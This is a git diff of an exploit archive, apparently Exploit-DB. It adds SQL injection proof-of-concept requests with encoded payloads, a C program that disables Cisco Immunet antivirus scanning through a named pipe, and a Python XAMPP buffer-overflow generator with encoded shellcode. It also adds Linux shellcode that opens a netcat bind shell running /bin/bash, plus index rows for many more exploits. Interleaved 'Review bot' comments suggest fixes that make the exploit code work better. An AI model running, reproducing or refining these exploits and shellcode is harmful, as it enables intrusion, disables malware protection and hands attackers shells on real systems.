HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate 
+Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 18:58:53 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Cache-Control: no-cache, must-revalidate +Expires: Sat, 26 Jul 1997 05:00:00 GMT +Keep-Alive: timeout=5, max=91 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/monitorremoto/view/setStatusEvento.php?idevento=[SQL] +# +GET /[PATH]/monitorremoto/view/setStatusEvento.php?idevento=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 19:01:04 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45829.c b/exploits/windows/dos/45829.c new file mode 100644 index 000000000..84cbaf244 --- /dev/null +++ b/exploits/windows/dos/45829.c 
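Review bot: All three requests carry the same `Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2`, so the endpoints may require an authenticated session, yet the advisory does not say whether the injections work without it; a header line stating the precondition (`# Authentication: required / not required`) belongs in the file. PoC 1's payload is a time-based probe (`SLEEP(5)` is visible in the hex), but the captured response shows only `200 OK` with no timing — stating the observed delay is what makes a blind injection verifiable, and a multi-second response on `monitorasocAcc.php` is also the signal a defender would alert on. The responses for PoC 2 and PoC 3 likewise show headers only; one line each on what in the body confirmed the injection would close the gap.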
@@ -0,0 +1,189 @@ +/* +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt +[+] ISR: ApparitionSec + + +***Greetz: indoushka | Eduardo B.*** + + +[Vendor] +www.cisco.com + + +[Multiple Products] +Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0 + + +Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine. +The software is complementary with existing antivirus software. + +Cisco AMP (Advanced Malware Protection) +Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack. + + +[Vulnerability Type] +System Scan Denial of Service + + +[CVE Reference] +CVE-2018-15437 + +Cisco Advisory ID: cisco-sa-20181107-imm-dos +Cisco Bug ID: CSCvk70945 +Cisco Bug ID: CSCvn05551 + + +CVSS Score: +Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X + + +[Security Issue] +A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on +Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. + +This could allow executable files to be launched on the system without being analyzed for threats. +The vulnerability is due to improper process resource handling. + +An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or +Cisco AMP for Endpoints and executing a malicious file. + +A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from +being protected from further intrusion. + +There are no workarounds that address this vulnerability. 
+ +Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs. + +The affected end user will get pop up warning box when attempting to perform a file or system scan, + +"You Can Not Scan at This Time + +"The Immunet service is not running. + +Please restart the service and retry." + +Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported. + +[References] +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos + + +[Vulnerability Details] +Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present. + +FILE_FLAG_FIRST_PIPE_INSTANCE not present. + +Max Pipe Instances = FF (255) + +loc_140028140: + +lea rax, [rbp+57h+pSecurityDescriptor] +mov [rbp+57h+SecurityAttributes.nLength], 18h +mov edx, 1 ; dwRevision +mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax +lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor +mov [rbp+57h+SecurityAttributes.bInheritHandle], 1 +call cs:InitializeSecurityDescriptor +xor r9d, r9d ; bDaclDefaulted +lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor +xor r8d, r8d ; pDacl +lea edx, [r9+1] ; bDaclPresent +call cs:SetSecurityDescriptorDacl +mov rcx, [rdi+18h] ; lpName +lea rax, [rbp+57h+SecurityAttributes] +mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes +mov edx, 40000003h ; dwOpenMode +mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut +mov r9d, 0FFh ; nMaxInstances +mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize +mov r8d, 6 ; dwPipeMode +mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize +call cs:CreateNamedPipeW +mov [rdi+8], rax +call cs:GetLastError +test eax, eax +jz short loc_140028203 + + + +[Exploit/POC] + +"Cisco-Immunet-Exploit.c" +*/ + +#include +#define pipename "\\\\.\\pipe\\IMMUNET_SCAN" + +/* Discovered by hyp3rlinx + CVE-2018-15437 */ + +int main(void) { + 
+ while (TRUE){ + + HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL); + + if (pipe == INVALID_HANDLE_VALUE){ + + printf("Error: %d", GetLastError()); + + }else{ + + printf("%s","pipe created\n"); + + printf("%x",pipe); + + } + + ConnectNamedPipe(pipe, NULL); + + if(ImpersonateNamedPipeClient(pipe)){ + + printf("ok!"); + + }else{ + + printf("%s%d","WTF",GetLastError()); + + } + + CloseHandle(pipe); + + } + + return 0; + +} + +/* +[Network Access] +Local / Remote + + + +[Severity] +High + + + +Disclosure Timeline +============================= +Vendor Notification: August 7, 2018 +Vendor acknowledgement: August 7, 2018 +Vendor released fixes: November 7th, 2018 +November 8, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx +*/ \ No newline at end of file diff --git a/exploits/windows/local/45828.py b/exploits/windows/local/45828.py new file mode 100755 index 000000000..95cb38e16 --- /dev/null +++ b/exploits/windows/local/45828.py 
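Review bot: When `CreateNamedPipe` fails the loop prints the error but still falls through to `ConnectNamedPipe(pipe, NULL)`, `ImpersonateNamedPipeClient` and `CloseHandle` with `INVALID_HANDLE_VALUE`; the error branch needs a `continue;` (or `break;`) after its `printf`. `printf("%x",pipe)` passes a `HANDLE` to a `%x` conversion, which is undefined on 64-bit builds — use `printf("%p", (void *)pipe)`. As rendered here the `#include` line carries no header name; confirm it survived in the committed file, since the harness does not compile without the Win32 headers. The write-up's own analysis (NULL DACL, no `PIPE_REJECT_REMOTE_CLIENTS`, no `FILE_FLAG_FIRST_PIPE_INSTANCE`) is the part useful to defenders; a sentence pointing readers to the fixed versions in the linked Cisco advisory would round it out.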
@@ -0,0 +1,76 @@ +# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) +# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit). +# Shellcode Author: Giuseppe D'Amore (EDB:28996) +# Date: 2018-11-08. +# Software: XAMPP +# Version: 3.2.2 / 7.2.9 (Newest version at time of writing) +# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download +# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP. + +# Special thanks to Deloitte Ukraine for providing a few payed hours to create this exploit. + +# Steps to Reproduce: +# Run the python exploit script, it will create a new file with the name "exploit.txt". +# Copy the contents of "exploit.txt" +# Start the program and click "Config (Top Right With Symbol)" +# Paste the contents of "exploit.txt" into the following field: "Editor". +# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)". +# You will see that arbitrary code is executed. It should pop a messagebox. + +#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py -e x86/unicode_mixed BufferRegister=EAX +#Length is 352, but double it. 
+ +buf = "" +buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32" +buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a" +buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78" +buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51" +buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37" +buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a" +buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57" +buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36" +buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34" +buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f" +buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b" +buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e" +buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67" +buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72" +buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c" +buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f" +buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b" +buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41" +buf += "\x41" + +# venetian padding + +ven = "\x53" #push esi +ven += "\x43" #align +ven += "\x58" #pop eax +ven += "\x43" #align +ven += "\x05\x50\x11" #add eax,11005000 +ven += "\x43" #align +ven += "\x2d\x1c\x11" #sub eax,33001700 +ven += "\x43" #align +ven += "\x48" #dec eax +ven 
+= "\x43" #align +ven += "\x43"*2 #nops + +payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf)) + +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6f780129f..e6ed45c86 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6185,6 +6185,9 @@ id,file,description,date,author,type,platform,port 45806,exploits/windows/dos/45806.py,"HeidiSQL 9.5.0.5196 - Denial of Service (PoC)",2018-11-12,"Victor Mondragón",dos,windows, 45814,exploits/windows_x86-64/dos/45814.py,"CuteFTP 9.3.0.3 - Denial of Service (PoC)",2018-11-12,"Ismael Nava",dos,windows_x86-64, 45819,exploits/windows_x86-64/dos/45819.py,"Mongoose Web Server 6.9 - Denial of Service (PoC)",2018-11-12,"Ihsan Sencan",dos,windows_x86-64, +45823,exploits/macos/dos/45823.py,"CuteFTP Mac 3.1 - Denial of Service (PoC)",2018-11-13,"Yair Rodríguez Aparicio",dos,macos, +45824,exploits/linux/dos/45824.txt,"Evince 3.24.0 - Command Injection",2018-11-13,Matlink,dos,linux, +45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10094,6 +10097,8 @@ id,file,description,date,author,type,platform,port 45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux, 45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux, 45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows, +45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows, +45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -40317,15 +40322,33 @@ id,file,description,date,author,type,platform,port 45801,exploits/php/webapps/45801.txt,"OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection",2018-11-06,AkkuS,webapps,php,80 45802,exploits/php/webapps/45802.txt,"LibreHealth 2.0.0 - Arbitrary File Actions",2018-11-06,"Carlos Avila",webapps,php,80 45803,exploits/php/webapps/45803.txt,"PlayJoom 0.10.1 - 'catid' SQL Injection",2018-11-07,"Ihsan Sencan",webapps,php,80 -45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45808,exploits/linux/webapps/45808.txt,"TufinOS 2.17 Build 1193 - XML External Entity Injection",2018-11-12,"Konstantinos Alexiou",webapps,linux, -45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal",2018-11-12,"Pasquale Turi",webapps,php, -45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting",2018-11-12,"Pasquale Turi",webapps,php,80 +45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45811,exploits/hardware/webapps/45811.rb,"TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)",2018-11-12,Wadeek,webapps,hardware, -45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, -45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 
+45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45815,exploits/php/webapps/45815.txt,"Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-12,"Ihsan Sencan",webapps,php, -45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, -45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 +45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware, -45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 +45822,exploits/php/webapps/45822.txt,"CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting",2018-11-13,InfinitumIT,webapps,php, +45825,exploits/php/webapps/45825.txt,"Surreal ToDo 0.6.1.2 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45826,exploits/php/webapps/45826.txt,"Surreal ToDo 0.6.1.2 - Local File Inclusion",2018-11-13,"Ihsan Sencan",webapps,php,80 +45827,exploits/php/webapps/45827.txt,"Alienor Web Libre 2.0 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45830,exploits/php/webapps/45830.txt,"Musicco 2.0.0 - Arbitrary Directory Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php, +45833,exploits/php/webapps/45833.txt,"Tina4 Stack 
1.0.3 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45834,exploits/php/webapps/45834.txt,"Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45835,exploits/php/webapps/45835.txt,"Easyndexer 1.0 - Arbitrary File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45838,exploits/php/webapps/45838.txt,"Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45839,exploits/php/webapps/45839.txt,"ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)",2018-11-13,"Ameer Pornillos",webapps,php,80 +45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80 +45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 872f19abb..f4ad05de5 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
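Review bot: The new rows `45822` (CentOS Web Panel) and `45831` (Data Center Audit CSRF) are added with an empty `port` column, while the other new `webapps,php` rows in this hunk and the eight existing rows the hunk edits solely to fill in `80` all carry `80`; both are web-facing PHP entries, so the gap looks accidental — either set `80` or note why they are excluded. In the second hunk of this file the `45828` row credits only `Semen Alexandrovich Lyhin`, whereas that file's header names Gionathan Reale as co-author; worth checking against the index's convention for multiple authors.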
@@ -922,3 +922,4 @@ id,file,description,date,author,type,platform
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/45821.c b/shellcodes/linux_x86/45821.c
new file mode 100644
index 000000000..e3292e422
--- /dev/null
+++ b/shellcodes/linux_x86/45821.c
@@ -0,0 +1,55 @@
+/*
+# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
+# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work.
+# Date: 04/11/2018
+# Exploit Author: Javier Tello
+# Version: 1.0
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 58 Bytes
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 50 push %eax
+ 8048063: 68 6e 2f 6e 63 push $0x636e2f6e
+ 8048068: 68 2f 2f 62 69 push $0x69622f2f
+ 804806d: 89 e3 mov %esp,%ebx
+ 804806f: 50 push %eax
+ 8048070: 68 62 61 73 68 push $0x68736162
+ 8048075: 68 62 69 6e 2f push $0x2f6e6962
+ 804807a: 68 2d 65 2f 2f push $0x2f2f652d
+ 804807f: 89 e2 mov %esp,%edx
+ 8048081: 50 push %eax
+ 8048082: 68 39 39 39 39 push $0x39393939
+ 8048087: 68 2d 6c 70 39 push $0x39706c2d
+ 804808c: 89 e6 mov %esp,%esi
+ 804808e: 50 push %eax
+ 804808f: 52 push %edx
+ 8048090: 56 push %esi
+ 8048091: 53 push %ebx
+ 8048092: 89 e1 mov %esp,%ecx
+ 8048094: 89 c2 mov %eax,%edx
+ 8048096: b0 0b mov $0xb,%al
+ 8048098: cd 80 int $0x80
+
+===============poc by Javier Tello=========================
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+
+"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
+
+main() {
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
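Review bot: The harness at the end of the hunk declares `main() {` with no return type, which is implicit-int and not valid since C99, and the `printf` line passes the `size_t` from `strlen` to `%d`; `int main(void) {` and `printf("Shellcode Length: %zu\n", strlen(code));` fix both. The two `#include` directives name no header as rendered here — presumably `<stdio.h>` and `<string.h>` were lost to markup stripping, but that should be confirmed against the raw file since the listing does not compile without them. The header comment and the index entry both state that the shell listens on port 99999, which is outside the 16-bit TCP port range; nothing in the listing shows how netcat-traditional treats `-lp99999`, so the comment should record the port actually observed listening during the test rather than the literal argument. The harness also jumps straight into the `code[]` data array, which only works when the binary is built with an executable data segment, yet no build command is given; the header should state the compiler flags the author used.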
